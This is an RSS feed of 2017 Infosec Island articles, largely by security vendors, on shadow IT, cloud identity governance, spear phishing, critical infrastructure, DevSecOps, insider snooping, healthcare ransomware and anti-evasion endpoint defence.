Infosec Island Latest Articles Adrift in Threats? Come Ashore! en hourly 1 Shadow IT: The Invisible Network Tue, 14 Nov 2017 06:02:00 -0600 The term “shadow IT” is used in information security circles to describe the “invisible network” that user applications create within your network infrastructure. Some of these applications are helpful and breed more efficiency while others are an unwanted workplace distraction. However, all bypass your local IT security, governance and compliance mechanisms.

The development of application policies and monitoring technology have lagged far behind in comparison to the use of cloud-based business services, as researchers note in SkyHigh’s Cloud Adoption and Risk Report. It states, “The primary platform for software applications today is not a hard drive; it’s a web browser. Software delivered over the Internet, referred to as the cloud, is not just changing how people listen to music, rent movies, and share photos. It’s also transforming how business is conducted.” Recent studies show that businesses that follow this trend of migrating operations to the cloud actually increased productivity by nearly 20 percent above those who did not.

Shifting to a new security model before we determine the rules  

Traditional security thinking and products have focused solely on keeping the network and those within it safe from outside threats, and auditing information from users, devices and alerts. The application revolution is now pushing beyond the traditional network boundaries and into the cloud for security teams, before establishing acceptable-use policies and new auditing and compliance parameters. However, it is much more efficient to lay the auditing and policy groundwork first and then allow security operations to adapt to this new element of application awareness.

Why does application awareness change security operations so drastically? Because it:

  • Emphasizes outgoing (as opposed to incoming) communication
  • Requires relating users and devices to the applications (which older tools can’t perform)
  • Shifts the focus away from signature detection and into analytics and policy
  • Requires creating network and device use policy and implementing a means to track and measure it
  • Requires pulling logs from cloud services

Despite the security implications, there are important governance challenges when developing new application policies. While the discussion of implementing application awareness is mostly technical, the way employees use applications can also be deeply personal. Making a decision to allow or block Facebook, Twitter, Dropbox, Bit torrent, Tor and personal Gmail accounts touches a human factor that goes beyond merely stopping viruses and preventing breaches. Yet, allowing such applications (especially Tor) can increase the level of risk exponentially – even beyond the threats posed by many viruses.

Changing direction to a different point of view – the insider threat

Security follows business, and business is rapidly putting its information in the cloud. Most newer security products have evolved to focus both on what is entering the network and what is leaving the network. However, the shadow IT system often circumvents corporate monitoring and security measures, and allows corporate data to flow outside the organization into the public cloud without proper oversight or control.

Replacing the thread-bare notion that threats could only come into our systems from the outside is an ever-growing (and different) point of view that’s being complemented with products/devices that also monitor outgoing communications. Until recently, this capability has been limited to security interests in data loss prevention, policy filtering and compromised system detection.

Cloud Access Security Brokers (CASBs) are one type of outgoing protection for the network, and it does provide more visibility into network flows. It does add the burden of analysts having to sort through vast quantities of data. One Gartner analyst commented that the competitive forces currently amongst the CASB market providers “is a consequence of newness that limits the consistency and richness of the service they can provide.” He continued, “Data without action is kind of useless. Data has to be automatable so your team can solve the problem and move on to bigger projects.”

At this point, the point of view must pivot to gain vision into both the external threat and the internal or insider threat. The focus here is on your employees and their careless and maybe malicious behavior on network-connected devices. While some workers feel entitled to check social media or personal email applications at work, it is crucial that an organization develop smart and enforceable “acceptable-use” policies, along with regular, relevant training for all workers. This area of governance has lagged far behind the technological solutions; however, it is no less of an important piece of the visibility puzzle.

What about solid, consistent governance?

Governance is all about identifying risk and deciding what is acceptable. What is the risk of non-approved applications in a current enterprise environment? SkyHigh wrote a solid white paper on what they see as the risk in their Q4 2016 Cloud Adoption Risk Report (PDF). It should be noted that this report is biased in terms of the threat, but it does, at a minimum, provide a high-level explanation of the risk.

The above report prominently noted that email/phishing is the number one vector of attack, while web-based malware downloads are rarer by comparison. Buried deep in the SkyHigh study was the reason that we need to effectively capture application usage: while greater than 60 percent of organizations surveyed had a cloud use policy, almost all of that particular group lacked the needed enforcement capability. Roughly two-thirds of services that employees attempt to access are allowed based on policy settings, but most enterprises are still struggling to enforce blocking policies for the one-third in the remaining category that were deemed inappropriate for corporate use due to their high risk.

The ideal standard of control through enforcement is complicated even with a CASB in place, by security “silos,” and a struggle to consistently enforce polices across multiple cloud-based systems. Major violations still occur despite policies, such as: authorized users misusing cloud-based data, accessing data they shouldn’t be, synching data with uncontrolled PCs, and leaving data in “open shares,” in addition to authorized users having access despite termination or expiration. In short, before using a CASB you can implement use knowledge passively with other tools.

Implementing a means to passively detect applications and tracking that activity to the user and device is an essential aspect to governance and risk management. Shadow IT is the term most related to the risk associated with the threat that application awareness addresses, as opposed to the much more arduous task of drafting and implementing policies that could be controversial with fellow staff members.

About the Author: Chris Jordan is CEO of College Park, Maryland-based Fluency , a pioneer in Security Automation and Orchestration.

Copyright 2010 Respective Author at Infosec Island]]>
4 Questions Businesses Must Ask Before Moving Identity into the Cloud Wed, 08 Nov 2017 04:50:00 -0600 The cloud has transformed the way we work and it will continue to do so for the foreseeable future. While the cloud provides a lot of convenience for employees and benefits for companies in terms of cost savings, speed to value and simplicity, it also brings new challenges for businesses. When coupled with the fact that Gartner predicts 90 percent of enterprises will be managing hybrid IT infrastructures encompassing both cloud and on-premises solutions by 2020, the challenge becomes increasingly more complex.

As is the case with any significant technology initiative, moving infrastructure to the cloud requires forethought and preparation to be successful. For many enterprises, a cloud-first IT strategy means a chance to focus on the core drivers of the business versus managing technology solutions. As these enterprises consider a cloud-first approach, they will undoubtedly be moving their IT infrastructure and security to the cloud. And identity will not be left behind.

The big question for many IT and security operations departments is: can you move your identity governance solution to the cloud? And then, perhaps more importantly, should you? The answers to these questions will vary from company to company and are dependent on the needs of the business and the current structure of the identity program.

As such, here are 4 questions every organization must ask to determine if moving identity into the cloud is the right move for their business:

  • Have you already moved any infrastructure to the cloud?

While many business applications are relatively easy to use as a service, transferring a complex identity management program into the cloud can be more challenging to implement. If your organization is already using infrastructure-as-a-service (e.g. Amazon Web Services or Microsoft Azure) then you’re likely ready to move forward with implementing a cloud-based identity governance program. However, if you haven’t experimented with moving mission-critical apps into the cloud, you should carefully consider whether your organization is prepared before making the leap. 

  • How flexible is your organization?

Regardless of how it is deployed, an effective identity governance solution must provide complete visibility across all of your on-premises and cloud applications. This visibility provides the foundation required to build policies and controls essential for compliance and security.For organizations that don’t have the time or expertise to create custom identity policies or compliant processes from scratch, cloud-based solutions can make successful deployments more attainable. However, if your organization has rigid requirements about how identity management must be configured and deployed, it may be more of a challenge to move to a cloud-based solution.

  • Do you have limited resources?

Deploying an identity governance solution can be both time- and resource-intensive, and effective identity programs require a blend of people, processes and technology to be successful. The cloud is a great option for businesses with limited resources because it doesn’t involve hardware or infrastructure upgrades, making it faster and more cost-effective than on-premise solutions. Cloud-based identity is also great for organizations with smaller IT teams or those without as much specific expertise in the space.

  • How well do you understand your governance needs?

Identity governance is more than just modifying who has access to what. Effective identity governance must also answer the questions of should this user have access, what kind of access are they entitled to, and what can they do with that access. And while identity governance can be simple to use, what happens behind the scenes can be very complex. This is important to understand because SaaS-based identity governance is not as customizable as an on-premise solution. So, if your identity needs are fairly straight forward, the cloud might be for you, but if your organization requires more complexity and customization, on-premise might still be the best solution.

Whether you’re moving from an on-premise identity governance solution to the cloud or implementing a cloud-based identity governance solution for the first time, it’s important to take a close look at your organization and its needs before taking the next step. With these best practices in mind, you can properly manage identities and limit the risk of inappropriate access to your sensitive business data.

About the author: Dave Hendrix oversees the engineering, product management, development, operations and client services functions in his role as senior vice president of IdentityNow.

Copyright 2010 Respective Author at Infosec Island]]>
Artificial Intelligence: A New Hope to Stop Multi-Stage Spear-Phishing Attacks Tue, 07 Nov 2017 10:19:11 -0600 Cybercriminals are notorious for conducting attacks that are widespread, hitting as many people as possible, and taking advantage of the unsuspecting. Practically everyone has received emails from a Nigerian prince, foreign banker, or dying widow offering a ridiculous amount of money in return for something from you. There are countless creative examples of phishing, even health drugs promising the fountain of youth or skyrocketing your love life in return for your credit card.

In more recent times, cybercriminals are taking an “enterprise approach” to attacks. Just like business to business sales functions, they focus on a smaller number of targets, with an objective of obtaining an exponentially greater payload with extremely personalized and sophisticated techniques. These pointed attacks, labeled spear phishing, leverage impersonation of an employee, a colleague, your bank, or popular web service to exploit their victims. Spear phishing has steadily been on the rise, and according to the FBI, this means of social engineering has proven to be extremely lucrative for cybercriminals. Even more concerning, spear phishing is incredibly elusive and difficult to prevent with traditional security solutions. 

The most recent evolution in social engineering involves multiple premeditated steps. Cybercriminals hunt their victims instead of targeting company executives with a fake wire fraud out of the blue. They first infiltrate their target organization from an administrative mail account or low-level employee, then use reconnaissance and wait for the most opportune time to fool the executive by initiating an attack from a compromised mail account. Here are the abbreviated steps commonly taken in these spear phishing attacks and solutions to stop these attackers in their tracks. 

Step 1: Infiltration

Most phishing attempts are glaringly obvious for people that receive cyber security training (executives, IT teams) to sniff out. These emails contain strange addresses, bold requests, and grammar mistakes that often invoke deletion. However, there is a stark increase in personalized attacks that are extremely hard to sniff out, especially for people who aren’t trained. Many times, the only blemish to this attack is that malicious email links will be spotted only if you hover over them with your mouse. Highly trained individuals would spot this flaw but not common employees. 

This is why cybercriminals find easier targets at first. Mid-level sales, marketing, support and operations folks are the most usual. This initial attack is aimed to steal a username and password. When the attacker has control of this mid-level person, if they haven’t enabled multi-factor authentication (and many organizations do not), they can log into the account. 

Step 2: Reconnaissance

At this stage, cybercriminals will normally monitor the compromised account and study email traffic to learn about the organization. Often times, attackers will setup forwarding rules on the account to prevent logging in frequently. Analysis of the victim’s email traffic allows the attacker to understand more about the target and organization: who makes the decisions, who handles or influences financial transactions, has access to HR information, etc. It also opens the door for the attacker to spy on communications with partners, customers, and vendors.

This information is then leveraged for the final step of this spear phishing attack.

Step 3: Extract Value

Cybercriminals leverage this learned information to launch a targeted spear phishing attack. They often send customers fake bank account information precisely when they are planning to make a payment. They can hoax other employees to send HR information, wire money or easily sway them to click on links to collect additional credentials and passwords. Since the email is coming from a legitimate (albeit compromised) account like a colleague, it appears totally normal. The reconnaissance allows the attacker to precisely mimic the senders’ signature, tone and text style. So, how do you stop this attacker in his tracks? Thankfully there is a new hope and well-known methods for organizations to implement to thwart these cybercriminals from having their way, a multi-layer strategy.

End of the Line for Spear Phishing

There are three things that organizations should be employing now to combat spear phishing. The two obvious ones are user training and awareness and multi-factor authentication. The last, and newest technology to stop these attacks is real-time analytics and artificial intelligence. Artificial intelligence offers some of the strongest hope of shutting down spear phishing in the market today.  

AI Protection

Artificial intelligence to stop spear-phishing sounds futuristic and out of reach, but it’s in the market today and attainable for businesses of all sizes, because every business is a potential target. AI has the ability to learn and analyze an organization’s unique communication pattern and flag inconsistencies. The nature of AI is it becomes stronger, smarter and endlessly more effective over time to quarantine attacks in real-time while identifying high-risk individuals within an organization. For example, AI would have been able to automatically classify the email in the first stage of the attack as spear phishing, and would even detect anomalous activity in the compromised account, subsequently stopping stage two and three. It also has the ability to stop domain spoofing and authorized activity to prevent impersonation to customers, partners and vendors to steal credentials and gain access to their accounts.


It is absolutely essential for organizations to implement multi-factor authentication (MFA). In the above attack, if multi-factor authentication was enabled, the criminal would not have been able to gain entry to the account. There are many effective methods for multi-factor authentication including SMS codes or mobile phone calls, key fobs, biometric thumb prints, retina scans and even face recognition.

Targeted User Training

Employees should be trained regularly and tested to increase their security awareness of the latest and most common attacks. Staging simulated attacks for training purposes is the most effective activity for prevention and promoting an employee mindset of staying on alert. For employees who handle financial transactions or are higher-risk, it’s worth giving them fraud simulation testing to assess their awareness. Most importantly, training should be companywide and not only focused on executives.  

About the author: Asaf Cidon is Vice President, Content Security Services at Barracuda Networks. In this role, he is one of the leaders for Barracuda Sentinel, the company's AI solution for real-time spear phishing and cyber fraud defense.


Copyright 2010 Respective Author at Infosec Island]]>
Category #1 Cyberattacks: Are Critical Infrastructures Exposed? Tue, 07 Nov 2017 06:23:00 -0600 Critical national infrastructures are the vital systems and assets pertaining to a nation’s security, economy and welfare. They provide light for our homes; the water in our taps; a means of transportation to and from work; and the communication systems to power our modern lives. The loss or incapacity of such necessary assets upon which our daily lives depend would have a truly debilitating impact on a nation’s health and wealth. One might assume then that the security of such assets, whether virtual or physical, would be a key consideration. Or to put that another way, failing to address security vulnerabilities of such important systems would surely be an inconceivable idea.

However, the worrying truth is that the security measures of many of our nation’s critical systems are not, in the large, what they should be. Perhaps this shouldn’t be a surprise. The rapid progression of technology has enabled critical systems to become increasingly connected and intelligent, but with little experience of the problems this connectivity could create, few thought about the systems’ security.

Although this new found connectivity has helped industries to realise great productivity and efficiency benefits, the attack on Ukraine’s power grid in 2015 opened the eyes of many in charge of such industries. After nationwide power-outages struck, it has now become clear that if security is not prioritised, the worst-case scenario could wreak havoc across our nations. Prevention is a must; a short-term fix will only delay the inevitable…

Critical infrastructures: an imminent attack

Not a case of if. But when.

It has been two years since news of Ukraine’s power grid cyberattack made headlines across the globe. And once again, critical infrastructure security has been propelled into the spotlight following a number of recent reports suggesting that a devastating attack is imminent.

The UK’s National Cyber Security Centre (NCSC) revealed in its first annual review that it received 1,131 incident reports, with 590 of these classed as ‘significant’. This included the WannaCry ransomware that took down the NHS. While none of these were identified as category one incidents, i.e. interfering with democratic systems or crippling critical infrastructures such as power, the head of the NCSC, Ciaran Martin, warned there could be damaging attacks in the not too distant future.

Furthermore, US-CERT recently issued an alert warning critical national infrastructure firms, including nuclear, energy and water providers, that they are now at an increased risk of ‘highly targeted’ attacks by the Dragonfly APT group. This follows a report by security researchers Symantec, who recently found that during a two-year period the group has been increasing its attempts to compromise energy industry infrastructure, most notably in the UK, Turkey and Switzerland.

Although no damage has yet been done, the group has been trying to determine how power supply systems work and what could be compromised and controlled as a result. If we know the group now has the potential ability to sabotage or gain control of these systems should it decide to do so, this should increase the urgency around the preventative measures needed to defend against a future attack.It is therefore hardly surprising that to combat the rise of such threats, the first piece of EU-wide cybersecurity legislation has been developed to boost the overall level of cybersecurity in the EU. This is called the NIS Directive.

Addressing security from the outset

The potential consequences are disturbing, so infrastructure owners need to consider working in closer collaboration with security experts to ensure the lights remain on. While most in the security industry recognise that there is no silver bullet to ensure total security, we recommend all of those in charge of critical infrastructures ensure they have enough barriers in place to safeguard industrial and critical assets. Proactive regimes that balance defensive and offensive countermeasures, as well as include regular retraining and security techniques such as penetration testing and “red teaming”, are vital to keep defences sharpened.

One of the greatest lessons that should be heeded is that the issue of security must be addressed from the outset of infrastructure development and deployment. It has become abundantly clear that cyberattacks against critical infrastructures are only going to increase in the coming months and years. Those in charge of securing such environments must deploy a new preventative mindset, ensuring strong barriers are in place to avert the hijacking of any critical infrastructures before there is a need to clean up its devastating result.

About the author: Jalal Bouhdada is the Founder and Principal ICS Security Consultant at Applied Risk. He has over 15 years’ experience in Industrial Control Systems (ICS) security assessment, design and deployment with a focus on Process Control Domain and Industrial IT Security.

Copyright 2010 Respective Author at Infosec Island]]>
The Evolution from Waterfall to DevOps to DevSecOps and Continuous Security Fri, 03 Nov 2017 11:01:00 -0500 Software development started with the Waterfall model, proposed in 1956, where the process was pre-planned, set in stone, with a phase for every step. Everything was predictably…sluggish. Every organization involved in developing web applications was siloed, and had its own priorities and processes. A common situation involved development teams with their own timelines, but quality assurance teams had to test another app, and operations hadn’t been notified in time to build out the infrastructure needed. Not to mention, security felt that they weren’t taken seriously. Fixing a bug that was made early in the application lifecycle was painful, because testing was much later in the process. Repeatedly, the end product did not address the business’s needs because the requirements changed, or the need for the product itself was long gone.

The Agile Manifesto

After give or take 45 years of this inadequacy, in 2001, the Agilemanifesto emerged. This revolutionary model advocated for adaptive planning, evolutionary development, early delivery, continuous improvement, and encouraged rapid and flexible response to change. Agile adoption increased and therefore sped up the software development process embracing smaller release cycles and cross-functional teams. This meant that stakeholders could navigate and course correct projects earlier in the cycle. Applications began to be released on time with translated to addressing immediate business needs.

The DevOps Culture

With this increased agile adoption from development and testing teams, operations now became the holdup. The remedy was to bring agility to operations and infrastructure, resulting in DevOps. The DevOps culture brought together all participants involved resulting in faster builds and deployments. Operations began building automated infrastructure, enabling developers to move significantly faster. DevOps led to the evolution of Continuous Integration/Continuous Delivery (CI/CD), basing the application development process around an automation toolchain. To convey this shift, organizations advanced from deploying a production application once annually to deploying production changes hundreds of time daily.

Security as a DevOps Afterthought

Although many processes had been automated with DevOps thus far, some functions had been ignored. A substantial piece that is not automated, but is increasingly critical to an organization’s very survival, is security. Security is one of the most challenging parts of application development. Standard testing doesn’t always catch vulnerabilities, and many times someone has to wake up at three in the morning to fix that critical SQL Injection vulnerability. Security is often perceived as being behind the times – and more commonly blamed for stalling the pace of development. Teams feel that security is a barrier to continuous deployment because of the manual testing and configuration halting automated deployments.  

As the Puppet State of DevOps report aptly states:

All too often, we tack on security testing at the end of the delivery process. This typically means we discover significant problems, that are very expensive and painful to fix once development is complete, which could have been avoided altogether if security experts had worked with delivery teams throughout the delivery process”

Birth of DevSecOps

The next iteration in this evolution of DevOps was integrating security into the process – with DevSecOps. DevSecOps essentially incorporates security into the CI/CD process, removing manual testing and configuration and enabling continuous deployments. As organizations move toward DevSecOps, there are substantial modifications they are encouraged to undergo to be successful. Instilling security into DevOps demands cultural and technical changes. Security teams must be included in the development lifecycle starting day one. Security stakeholders should be integrated right from planning to being involved with each step. They need to work closely with development, testing, and quality assurance teams to discover and address security risks, software vulnerabilities and mitigate them. Culturally, security should become accustom to rapid change and adapting to new methods to enable continuous deployment. There needs to be a happy medium to result in rapid and secure application deployments.

Security Automation is the Key

A critical measure moving toward DevSecOps is removing manual testing and configuration. Security should be automated and driven by testing. Security teams should automate their testing and integrate them into the overall CI/CD chain. However, based on each individual application, it’s not uncommon for some tests to be manual – but the overall portion can and should be automated. Especially tests that ensure applications satisfy certain defined baseline security needs. Security should be a priority from development to pre-production and should be automated, repeatable and consistent. When done correctly, responding to security vulnerabilities becomes much more trivial each step of the way which inherently reduces time taken to fix and mitigate flaws.

Continuous Security Beyond Deployment

Continuous security does not stop once an application is deployed. Continuous monitoring and incident response processes should be incorporated as well. The automation of monitoring and the ability to respond quickly to events is a fundamental piece toward achieving DevSecOps. Security is more important today than ever before. History shows that any security breach event can be catastrophic for both customers, end users and organizations themselves. With more services going online and hosted in the cloud or elsewhere the threat landscape is growing at an exponential rate. The more software written inherently results in more security flaws and more attack surface. Incorporating security into the daily workflow of engineering teams and ensuring that vulnerabilities are fixed or mitigated much ahead of production is critical to the success of any product and business today.

About the author: Jonathan Bregman is a Product Marketing Manager with Barracuda Networks focused on web application firewalls and DDoS prevention for customers. Prior to Barracuda, Jonathan was a research and development engineer with Google.

Copyright 2010 Respective Author at Infosec Island]]>
From the Medicine Cabinet to the Data Center – Snooping Is Still Snooping Fri, 03 Nov 2017 08:52:00 -0500 We’ve all done it in one form or another. You go to a friend’s house for a party and you have to use the restroom. While you are there, you look behind the mirror or open the cabinet in hopes of finding out some detail -- something juicy -- about your friend. What exactly are you looking for? And why? Are you feeding into some insecurity? You don’t really know, you just know you are compelled to look.

Turns out that same human reaction carries forward to your place of employment. 

At One Identity we recently conducted a global survey that revealed a lot of eye-opening facts about people’s snooping habits on their company’s network.  At a high level, the survey revealed that when given the opportunity to look through sensitive company data that employee may not be permitted to access -- the instinct is to snoop. Before we get into specific  results, here are the demographics:

  • We surveyed over 900 people from around the world.
  • Countries include the U.S., U.K., Germany, France, Australia, Singapore and Hong Kong.
  • Eighty-seven percent have privileged access to something within their place of employment.
  • They all have some level of security responsibility with varied titles ranging from executive to front-line security pros.
  • Twenty-eight percent are from large enterprises (>5,000 employees)); 28 percent from mid-sized enterprises (2,000 to 5,000 employees); the remainder were from organizations with less than 2,000 employees.

Key Finding Number One: 92 percent of respondents stated that employees at their company attempt to access information that they do not need. 

Think about that. Ninety-two percent of us are trying to access the information we don’t need to get our jobs done. Imagine if any employee at your company could access sensitive data like salary. That would. Now imagine employees obtained access to financial data, customer data or merger information -- and then shared it. The result could be catastrophic to your business.

Key Finding Number Two: 66 percent of the security professionals surveyed have tried to access the information they didn’t need.

Worse yet, these are security people that probably have some form of elevated privileges. This means not only are they attempting to access that information but in many cases, they are actually obtaining access and ultimately abusing that privilege.

Key Finding Number Three: Executives are more likely to snoop than managers or front-line workers.

Interestingly, IT security executives are the most likely to look for sensitive data not relevant to their job than any other job level. This is worrisome for many since they tend to have greater access rights and permissions -- once again, indicated abuse of power.

The bottom line here is that organizations should be alarmed by these findings. A common myth among many is that data is safe when it’s on a company network and in the hands of its trusted employees -- it’s the outsiders and hackers you have to look out for. While the latter is certainly true, the data shows that the majority of all employees -- even those within the ranks of IT security groups -- are nosy when given the opportunity to be. Implementing best practices around identity and access management -- like role-based access rights and permissions and applying identity analytics to spot any signs of unusual access behavior -- can help organizations safeguard themselves from letting sensitive data fall into the wrong hands before it’s too late.

About the author: Jackson Shaw is senior director of product management at One Identity, an identity and access management company formerly under Dell. Jackson has been leading security, directory and identity initiatives for 25 years.

Copyright 2010 Respective Author at Infosec Island]]>
Healthcare Orgs in the Crosshairs: Ransomware Takes Aim Fri, 03 Nov 2017 04:57:00 -0500 Criminals are using ransomware to extort big money from organizations of all sizes in all industries. But healthcare organizations are especially attractive targets. Healthcare organizations are entrusted with the most personal, intimate information that people have – not just their financial data, but their very private health and treatment histories. Attackers perceive healthcare IT security to be the least effective and outdated in comparison with other industries. They also know that healthcare organizations tend to have significant cash on hand and have a high cost of downtime, therefore are more likely to pay the ransom for encrypted data. If you fail to take the necessary steps to combat ransomware and other advanced malware and that trust is betrayed, the cost to your business could extend far beyond paying a ransom or a noncompliance fine. If your reputation for safeguarding patient data is damaged, not only will you be scrutinized under the microscope, in some cases, companies never recover and leadership is forced to resign.

Healthcare is making strides but isn’t there yet

There is good news. Healthcare organizations have made significant security improvements over the last year. According to the HIMMS 2017 Cybersecurity Survey, it is clear that IT security is an urgent business challenge for leadership, rather than solely an IT problem. There is a marked increase in the employment of CIOs and Chief Information Security Officers (CISOs) among healthcare organizations, and security shortcomings are being addressed.

Nonetheless, there is still room for improvement and ransomware attacks continue to be a serious and growing challenge. Those who continue to commit vital resources to implementing effective security measures will emerge as winners and you will never hear of them in the media. Effectively combating ransomware requires a well-thought-out combination of technical and cultural measures.

Detection: discovering the weaknesses

Keeping your network free of ransomware and other advanced malware requires a combination of effective perimeter filtering, strategically designed network architecture, and the capability to detect and eliminate resident malware that may already be inside your network. It’s an exercise of cleaning house as your infrastructure likely contains a number of latent threats. Email inboxes are full of malicious attachments and links just waiting to be clicked on. Similarly, all applications, whether locally hosted or cloud-based, must be regularly scanned and patched for vulnerabilities. There should be a regular vulnerability management schedule for scanning and patching of all network assets, which is checking the box for basics but extremely critical for thwarting threats. Building a solid foundation such as this is a fantastic start for effective ransomware detection and prevention.

Prevention: A non-negotiable requirement

There are some very effective security technologies that are a requirement in today’s threat landscape in order to prevent ransomware and other attacks. Prevention of threats entering the network requires a modern firewall or email gateway solution to filter out the majority of threats. An effective solution should scan incoming traffic using signature matching, advanced heuristics, behavioral analysis, sandboxing, and the ability to correlate findings with real-time global threat intelligence. This will ultimately prevent employees from having to be perfectly trained to spot these sophisticated threats. It’s recommended to control and segment network access to minimize the spread of threats that do get in. Ensure that patients and visitors can only spread malware within their own, limited domain, while also segmenting, for example, administration, caregivers, and technical staff, each with limited, specific access to online resources.Even with the most sophisticated methods like spear phishing, where attackers impersonate your coworker, there are now machine learning and artificial intelligence solutions that can spot and quarantine these threats before they ever get to an employee. The risk for healthcare organizations is immensely reduced when solutions such as these are deployed as part of an overall security posture.  However, when data is encrypted and held ransom, the fight isn’t over yet.

Backup—Your Last, Best Defense Against Ransomware

When a ransomware attack succeeds, your critical files—HR, payroll, electronic health records, patient financial and insurance info, strategic planning documents, email records, etc.—are encrypted, and the only way to obtain the decryption key is to pay a ransom. But if you’ve been diligent about using an effective backup system, you can simply refuse to pay and restore your files from your most recent backup—your attackers will have to find someone else to rob.Automated, cloud-based backup services can provide the greatest security. Reputable vendors offer a variety of very simple and secure backup service options, priced for organizations of any size, and requiring minimal staff time. Advanced solutions can even allow you to spin up a virtual copy of your servers in the cloud, restoring access to your critical files and applications within minutes of an attack or other disaster.

When all of these things are working simultaneously, healthcare organizations are well equipped to stop ransomware attacks effectively. Ransomware and other threats are not going away anytime soon and healthcare will continue to be a target for attackers. The hope is that healthcare professionals continue to keep IT security top of mind. 

About the author: Sanjay is a 20 year veteran in technology and has a passion for cutting edge technology and a desire to innovate at the intersection of technology trends. He currently leads product management, marketing and strategy for Barracuda’s security business worldwide

Copyright 2010 Respective Author at Infosec Island]]>
Thinking Outside the Suite: Adding Anti-Evasive Strategies to Endpoint Security Fri, 03 Nov 2017 01:52:29 -0500 Despite ever-increasing investments in information security, endpoints are still the most vulnerable part of an organization’s technology infrastructure. In a 2016 report with Rapid7, IDC estimates that 70% of attacks start from the endpoint. Sophisticated ransomware exploded into a global epidemic this year, and other forms of malware exploits, including mobile malware and malvertising are also on the rise.


The only logical conclusion is that existing approaches to endpoint security are not working. As a result, security teams are exposed to mounting, multifaceted challenges due to the ineffectiveness of their current anti-malware solutions, large numbers of security incidents requiring costly and intensive response, and added pressure from the board to undergo risky and expensive “rip and replace” endpoint security procedures.


Current endpoint security solutions employ varying approaches. Some restrict the actions that legitimate applications can take on a system, others aim to prevent malicious software from running, and some monitor activity for incident investigations. The challenge for most IT department heads is finding the right balance of solutions that will work for their particular business.


Endpoint Protection Platforms (EPP), usually offered by established endpoint security vendors, promote the benefits of packaging endpoint control, anti-malware, and detection and response all in one agent, managed by from one console. While EPP suites can be useful and practical, it’s important to understand their limitations. For starters, a “suite” does not always mean the products are integrated — you may end up with one vendor but multiple agents and management consoles. Second, no single vendor offers the best-in-breed or best-for-your-business options for all the component solutions. If you adopt the EPP approach, be aware that you will be making trade-offs of some sort. Finally, it is likely that even after going through the painful process of deploying a full endpoint protection suite, it will still fail to prevent many attacks.


All these solutions, whether installed separately or as a suite, produce alerts. Many work by finding attacks that have already “landed” to some degree. This means your team will be busy (if not overwhelmed) sorting through the alerts for priority threats, investigating incidents, and remediating any intrusions. This can lead to inefficiencies and escalating staffing requirements, which will quickly wipe out any cost savings you hoped would come from installing bundled solutions.


In the end, it is imperative to understand the strengths and weaknesses within each suite and evaluate whether a best-of-breed or “suite-plus” approach offers better protection for your investment — this is often the case. EPP implementation can help companies consolidate vendors in order to reduce administrative overhead and licensing costs. It may also help minimize complexity and reduce the impact on operations, end-users, and business agility. But none of this matters much if the shortcomings of the platform end up introducing unacceptable levels of risk, draining staff resources, or constraining productivity and agility.


For example, it’s important to recognize that accepting the low detection rates of your conventional antivirus solution also means accepting the high likelihood of a breach. That’s because there is one critical factor most platforms don’t adequately address: unknown malware that has been designed specifically to evade existing defenses. Innovative endpoint defense strategies have emerged that allow you to block evasive malware, regardless of whether there is a known signature, behavior pattern, or machine learning model. This is achieved through the creative use of deceptive tricks that control how the malware perceives its environment.

Endpoint defense solutions that can neutralize evasive malware use three primary strategies: creating a hostile environment, preventing injection through deception, and restricting document executable capabilities. All three strategies contain and disarm the malware before it ever unpacks or puts down roots. 

To create a hostile environment, the malicious program is tricked into believing the environment is not safe for execution, resulting in the malware suspending or terminating its execution. To prevent malicious software from hiding in legitimate processes, the malware is deceived into registering that memory space is unavailable, so it never establishes a foothold on the device. To block malicious actions initiated by document files (via macros, PowerShell, and other scripts), the malware is tricked into registering that system resources like shell commands are not accessible.

These new strategies reduce risk without requiring increased overhead (nothing malicious installed, so nothing to investigate) or replacement of existing solutions. Anti-evasion solutions work alongside installed AV solutions to provide an added layer of protection against sophisticated malware and ransomware. The threat intelligence they produce (identifying previously unknown malware exploits) enhances your overall security program. In addition, because incident responders have fewer alerts and incidents to sort through, they can focus their expertise on high-priority threats and investigating attacks where the intruder has already gained access to the network.

Working smarter is key to managing the growing and ever-shifting challenges and responsibilities faced by security teams. Reducing workload and manual processes while reducing risk is a tough balancing act. Ongoing cyber security talent shortages combined with multiplying threat vectors make effective automated defenses a critical priority. Getting the most value out of your security budget and skilled experts requires neutralizing threats upfront, preventing as many attacks as possible, and developing automated threat management processes. It’s essential to cover gaps and shortcomings, augmenting existing endpoint security by layering on innovative, focused solutions. Given the recent surge of virulent, global malware and ransomware, anti-evasion defenses are a smart place to start.

About the author: Eddy Boritsky is the CEO and Co-Founder of Minerva Labs, an endpoint security and anti-evasion technology solution provider. He is a cyber and information security domain expert. Before founding Minerva, Eddy was a senior cyber security consultant for the defense and financial sectors.

Copyright 2010 Respective Author at Infosec Island]]>
Managing Cyber Security in Today’s Ever-Changing World Thu, 26 Oct 2017 09:30:27 -0500 When it comes to victims of recent cyber-attacks, their misfortune raises a few critical questions:

  • Is anything really safe? 
  • Do the security recommendations of experts actually matter? 
  • Or do we wait for our turn to be victimized, possibly by an attack so enormous that it shuts down the entire data-driven infrastructure at the heart of our lives today?

As the Executive Director of the Information Security Forum (ISF), an organization dedicated to cyber security, my own response is that major disruptive attacks are indeed possible, however, they are not inevitable. A future in which we can enjoy the benefits of cyber technology in relative safety is within our reach. 

Nevertheless, unless we recognize and apply the same dynamics which have constructively channeled other disruptive technologies, the rate and severity of cyber attacks could easily grow. 

Technical Advances

It may seem surprising, particularly in light of the tremendous technological achievement represented by the Internet and digital technology generally, that further advances in technology – which are both desirable and inevitable – may be the least important of the forces taming cybercrime. Progress in the fields of encryption and related security measures will inevitably continue. And they will just as inevitably be followed by progress in developing countermeasures. Some of those countermeasures will be the creations of technically savvy individuals – even teenage whiz kids, born in the digital age, to whom every security regimen is simply another challenge to their hacking skills. 

Over time, the contours of cybercriminal enterprise have grown to become specialized, like that of mainstream business, operating out of conventional office spaces, providing a combination of customer support, marketing programs, product development, and other trappings of the traditional business world. Some organizations develop and sell malware to would-be hackers, often including adolescents and those with relatively little computer skill of their own. Others acquire and use those tools to break into corporate networks, harvesting their information for sale or ransoming it back to its owners. Still others wholesale those stolen data files to smaller operators who either resell them or try using them to siphon money from their owners’ accounts.

Artificial intelligence using advanced analytics could offer a significant, if temporary advance in thwarting potential attackers. IBM, for example, is teaching its Watson system the argot of cyber security, which could, at least in principle, help it to recognize and block threats before they cause significant harm. But technological advances tend to be a cat and mouse game, with hackers in close pursuit of security workers. And security workers themselves can be compromised to bring their best tools over to the dark side.

